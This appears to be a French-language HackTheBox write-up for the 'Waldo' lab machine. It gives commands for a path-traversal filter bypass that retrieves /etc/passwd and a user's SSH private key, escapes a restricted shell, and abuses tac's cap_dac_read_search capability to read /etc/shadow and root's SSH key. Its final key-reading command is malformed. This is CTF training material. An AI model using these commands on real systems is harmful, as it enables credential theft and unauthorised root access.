Waldo HackTheBox (Writeup)

Skills:

LFI (Local File Inclusion) - Filter Bypass
Obtaining a user's SSH private key through the LFI
Escaping from a container
Restricted Shell Bypass
Abusing Capabilities (cap_dac_read_search+ei) [Privilege Escalation]

Reconnaissance:

Création de l'espace de travail :

Nous établirons notre espace de travail en créant trois dossiers pour stocker les contenus importants, les exploits et les résultats de la reconnaissance à l'aide de Nmap.

Vérification de la Connectivité VPN

Vérification de la connexion VPN pour assurer une communication stable avec la machine cible.

Recherche des ports ouverts avec Nmap :

Exploration des ports ouverts et exportation dans le fichier "allPorts" dans le répertoire Nmap:

nmap -p- --open -sS -n -Pn -vvv --min-rate 5000 10.10.10.87 -oG allPorts

Scan de la version des ports avec Nmap 22,80:

Utilisation de Nmap pour scanner la version des ports et extraction des informations dans le fichier "targeted" :

nmap -sCV -p22,80 10.10.10.87 -oN targeted

Exploitation du Port 80

Interception avec BurpSuite

Nous analysons les requêtes et identifions une vulnérabilité LFI (Local File Inclusion).

Test LFI basique

Nous essayons d’accéder à /etc/passwd :

../../../../etc/passwd

Cela ne fonctionne pas.

Contournement du filtre LFI

Nous testons un contournement avec

....//....//../....//..//....//etc/passwd

Ce contournement fonctionne, et nous pouvons maintenant lister le fichier /etc/passwd.

Extraction du fichier avec Curl

Nous utilisons curl pour récupérer le fichier via l'endpoint vulnérable :

curl -s -X POST http://10.10.10.87/fileRead.php -d "file=....//....//../....//..//....//etc/passwd" | jq -r '.file'

Nous trouvons l’utilisateur nobody.

Accès au répertoire `.ssh` de nobody

Nous interceptons la requête de la page list.html et constatons que la variable path est utilisée pour récupérer les fichiers.

Nous explorons le répertoire home de nobody :

....//....//../....//..//....//home/nobody/.ssh/

Nous trouvons un fichier .monitor.

Extraction de la clé privée SSH

curl -s -X POST http://10.10.10.87/fileRead.php -d "file=....//....//../....//..//....//home/nobody/.ssh/.monitor" | jq -r '.file'

Nous récupérons une clé privée.

Connexion SSH à nobody

Nous nous connectons avec la clé récupérée :

ssh [email protected] -i id_rsa

Flag user.txt :)

Pivoting User operator

Nous identifions un utilisateur operator

Nous trouvons un fichier authorized_keys appartenant à monitor.

Connexion SSH à monitor

ssh [email protected] -i .monitor

Nous nous retrouvons dans un shell restreint (rbash).

Contournement du shell restreint

Nous lançons une session SSH en spécifiant bash :

ssh [email protected] -i .monitor "bash --noprofile"

Élévation de Privilèges

Capabilities- Tac

Nous listons les fichiers avec des capacités spécifiques :

getcap -r / 2>/dev/null

Nous identifions que tac dispose de la capacité cap_dac_read_search+ei :

Exploitation de tac pour lire les fichiers protégés

La commande tac (inverse de cat) nous permet de lire les fichiers en inversant leur contenu.

tac /etc/shadow

Flag root.txt :)

Lecture du flag root.txt

tac /root/root.txt | tac

Récupération de la clé SSH root

/usr/bin/tac | /root/.ssh/id_rsa | /usr/bin/tac

Mis à jour il y a 1 an

hashtagReconnaissance:

hashtagExploitation du Port 80

hashtagInterception avec BurpSuite

hashtagTest LFI basique

hashtagContournement du filtre LFI

hashtagExtraction du fichier avec Curl

hashtagAccès au répertoire .ssh de nobody

hashtagExtraction de la clé privée SSH

hashtagConnexion SSH à nobody

hashtagFlag user.txt :)

hashtagPivoting User operator

hashtagConnexion SSH à monitor

hashtagContournement du shell restreint

hashtagÉlévation de Privilèges

hashtagCapabilities- Tac

hashtagExploitation de tac pour lire les fichiers protégés

hashtagFlag root.txt :)